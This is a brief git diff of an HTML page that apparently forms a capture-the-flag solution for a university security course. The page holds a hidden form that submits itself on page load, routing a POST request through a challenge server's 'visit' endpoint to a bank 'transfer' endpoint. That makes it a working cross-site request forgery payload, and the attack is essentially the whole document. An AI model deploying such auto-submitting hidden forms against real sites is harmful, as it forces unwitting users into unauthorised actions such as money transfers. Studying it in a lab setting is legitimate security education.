--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <html>
   <head>
-    <title>Fake Form</title>
+    <title>bank_form</title>
   </head>
   <body onload="document.bank_form.submit()">
     <form action="http://cs2107-ctfd-i.comp.nus.edu:5004/visit?url=https://runoutofit.github.io/form/visit?url=http://svb:5003/transfer/1" method="POST" name="bank_form" style="display: none;">
